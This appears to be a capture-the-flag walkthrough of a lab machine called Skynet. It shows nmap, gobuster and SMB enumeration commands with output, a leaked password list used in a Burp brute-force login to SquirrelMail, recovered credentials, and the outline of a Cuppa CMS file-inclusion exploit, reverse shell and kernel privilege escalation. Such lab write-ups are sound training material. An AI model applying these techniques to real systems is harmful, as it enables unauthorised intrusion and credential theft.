Reconnaissance
As always, the first step consists of the reconnaissance phase as port scanning.
Ports Scanning
During this step, we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -oA nmap -Pn 10.10.88.15
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+bo
z3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SC
pk2YSrj4A7
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
| 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
|_pop3-capabilities: TOP UIDL SASL AUTH-RESP-CODE RESP-CODES PIPELINING CAPA
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 63 Dovecot imapd
|_imap-capabilities: OK Pre-login more ID LITERAL+ IDLE have capabilities SASL-IR post-login listed LOGIN-REFERRALS LOGINDISABLEDA0001 ENABLE IMAP4rev1
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumerating Port 80
If we navigate to URL:80 we’ll get a search engine.
Let’s run gobuster to find some hidden directories or files.
Gobuster
gobuster -w $COMMON -u http://10.10.88.15
Gobuster found /admin and /squirrelmail directory.
/admin
/squirrelmail
We don’t yet have SquirrelMail credentials let’s move forward with SMB enumeration and come back.
Enumerating SMB
We can do our initial scan of SMB shares with Nmap.
Nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.88.15
SMBClient
smbclient -L //10.10.88.15 -N
We have two shares anonymous and milesdyson which we’re gonna focus for right now and look for some interesting files inside.
root@m4sterph0enix:/home/m4sterph0enix/Desktop/hackme/Skynet# smbclient //10.10.88.15/anonymous -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Sep 18 09:41:20 2019
.. D 0 Tue Sep 17 12:20:17 2019
attention.txt N 163 Wed Sep 18 08:04:59 2019
logs D 0 Wed Sep 18 09:42:16 2019
books D 0 Wed Sep 18 09:40:06 2019
9204224 blocks of size 1024. 5373516 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
. D 0 Wed Sep 18 09:42:16 2019
.. D 0 Wed Sep 18 09:41:20 2019
log2.txt N 0 Wed Sep 18 09:42:13 2019
log1.txt N 471 Wed Sep 18 09:41:59 2019
log3.txt N 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5373516 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.5 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \logs\>
We have downloaded two files attention.txt and log1.txt let’s take a look at those.
attention.txt
A recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this.
-Miles Dyson
log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
As attention.txt hints towards malfunction and passwords changed. Our credentials for SquirrelMail are inside log1.txt let’s brute force it.
BurpSuite
Start intercepting and send SquirrelMail requests to the intruder to brute force login.
We have a list of passwords inside log1.txt but don’t know the username but if you look at attention.txt there’s a user ‘Miles Dyson’ let’s include that for now!
username: milesdyson
password: cyborg007haloterminator
Let’s login at SquirrelMail.
And we are greeted with three emails one of which we’re looking for “Samba Password Reset”
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
Looks like we found SMB user credential to access ‘milesdyson’ share.
Inside notes there’s an important.txt file which we’re gonna download.
Let’s take a look inside important.txt
This seems /45kra24zxs28v3yd like a directory let’s check it.
This is what we got!
Let’s do directory enumeration.
GoBuster
gobuster -w $COMMON -u http://10.10.17.161/45kra24zxs28v3yd/ -t 50
There’s an /administrator directory let’s check it out.
There’s cuppa CMS installed let’s search for exploits.
Searchsploit
There’s Local/Remote File Inclusion exploit available for Cuppa CMS.
Testing The Exploit
Let’s upload our payload and get a reverse shell.
Exploitation
Remote File Inclusion
User.txt
User flag located inside /home/milesdyson/user.txt
Privilege Escalation
Now we’re in the machine let’s enumerate further to escalate privileges.
Method #1
Linux kernal 4.8.0-58 is exploitable.
Linux version 4.8.0-58-generic
Compile and run the exploit.
And we got root!